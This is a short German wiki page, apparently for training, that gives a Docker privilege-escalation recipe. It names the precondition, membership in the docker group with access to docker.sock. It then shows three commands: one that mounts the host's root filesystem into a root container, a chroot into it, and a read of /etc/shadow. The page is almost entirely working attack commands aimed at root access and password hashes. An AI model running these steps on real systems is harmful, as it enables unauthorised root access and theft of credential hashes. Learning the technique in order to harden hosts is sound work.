Docker Privilige Escalation

Aus Xinux Wiki

Version vom 16. Juli 2021, 13:46 Uhr von Thomas.will (Diskussion | Beiträge) (→‎Im Container)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Vorraussetzung

User muss in der Gruppe docker sein

Zugriff auf

srw-rw---- 1 root docker 0 Jul 16 08:38 /run/docker.sock

Auf dem Host

docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash

Im Container

chroot /mnt

Zugriff

cat /etc/shadow

Abgerufen von „http://wiki.ixheim.de/index.php?title=Docker_Privilige_Escalation&oldid=26067“